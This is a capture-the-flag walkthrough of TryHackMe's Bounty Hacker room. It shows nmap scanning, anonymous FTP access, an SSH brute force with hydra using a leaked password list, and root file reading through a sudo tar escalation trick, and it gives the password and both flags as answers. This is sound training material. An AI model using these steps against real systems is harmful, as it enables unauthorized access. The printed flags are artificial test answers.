ctfCybersecurityTryhackme

Bounty Hacker Tryhackme Walkthrough

Ankit kumar
Ankit kumar
3 Min Read

The Bounty Hacker room on TryHackMe is an excellent challenge for beginners to practice using common penetration testing tools such as Nmap, FTP, SSH, and Hydra. It also provides a solid introduction to privilege escalation techniques, using sudo privileges and tools like tar for root access.

Contents
Finding Open Ports on the MachineSummary:Who Wrote the Task List?Answer:What Service Can You Bruteforce with the Text File Found?Bruteforce SSH with Hydra:Answer:User FlagUser Flag:Root FlagRoot Flag:

If you’re looking to improve your skills in hacking and penetration testing, this room is a great starting point.

Finding Open Ports on the Machine

We start by running a standard Nmap scan to identify open ports and services running on the target machine.

kali@kali:~$ nmap -sC -sV -A 10.10.14.83

The Nmap output reveals several common services running on the target:

  • FTP on port 21 (vsftpd 3.0.3)
  • SSH on port 22 (OpenSSH 7.2p2)
  • HTTP on port 80 (Apache 2.4.18)

Summary:

  • Ports discovered: 21 (FTP), 22 (SSH), 80 (HTTP)

Who Wrote the Task List?

Next, we connect to the FTP service as the anonymous user to explore available files.

kali@kali:~$ ftp 10.10.14.83

We successfully login and list the files:

ftp> ls
-rw-rw-r-- 1 ftp ftp 418 Jun 07 21:41 locks.txt
-rw-rw-r-- 1 ftp ftp 68 Jun 07 21:47 task.txt
ftp> mget *

We download both files to investigate further:

  • task.txt contains the following message:
1.) Protect Vicious.
2.) Plan for Red Eye pickup on the moon.
-lin

The task list was written by lin.

Answer:

  • Who wrote the task list? lin

What Service Can You Bruteforce with the Text File Found?

Looking at the contents of locks.txt, we can see multiple password variations for lin:

rEddrAGON
ReDdr4g0nSynd!cat3
Dr@gOn$yn9icat3
...
ReDSynd1ca7e

We now have a potential password list for lin, and we will use Hydra to brute-force the SSH service.

Bruteforce SSH with Hydra:

kali@kali:/tmp$ hydra -l lin -P locks.txt ssh://10.10.14.83

Hydra successfully cracks lin’s SSH password:

[22][ssh] host: 10.10.14.83 login: lin password: RedDr4gonSynd1cat3

Answer:

  • What service can you bruteforce? ssh
  • What is the user’s password? RedDr4gonSynd1cat3

User Flag

We now have SSH access as lin. We connect to the machine via SSH:

kali@kali:/data/tmp$ ssh lin@10.10.14.83

After logging in, we navigate to the Desktop and find the user.txt flag:

lin@bountyhacker:~/Desktop$ cat user.txt
THM{CR1M3_SyNd1C4T3}

User Flag:

  • User flag: THM{CR1M3_SyNd1C4T3}

Root Flag

To escalate our privileges, we check the privileges for lin using the sudo command:

lin@bountyhacker:~/Desktop$ sudo -l

We discover that lin can run tar as root:

User lin may run the following commands on bountyhacker:
(root) /bin/tar

By exploiting this privilege, we use GTFOBins to read the root flag with tar. The command looks like this:

lin@bountyhacker:~/Desktop$ LFILE=/root/root.txt
lin@bountyhacker:~/Desktop$ sudo tar xf "$LFILE" -I '/bin/sh -c "cat 1>&2"'

This command extracts the contents of /root/root.txt as root, and we see the root flag:

Root Flag:

  • Root flag: THM{80UN7Y_h4cK3r}

TAGGED:
Share This Article
ByAnkit kumar
Follow:
I am a cybersecurity professional specializing in penetration testing (VAPT), network security, and ethical hacking. With a passion for solving complex security challenges, I actively engage in Capture the Flag (CTF) competitions and share detailed walkthroughs to help others in the cybersecurity community. My goal is to identify vulnerabilities and strengthen defenses to create safer digital environments.
Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *

You Might Also Like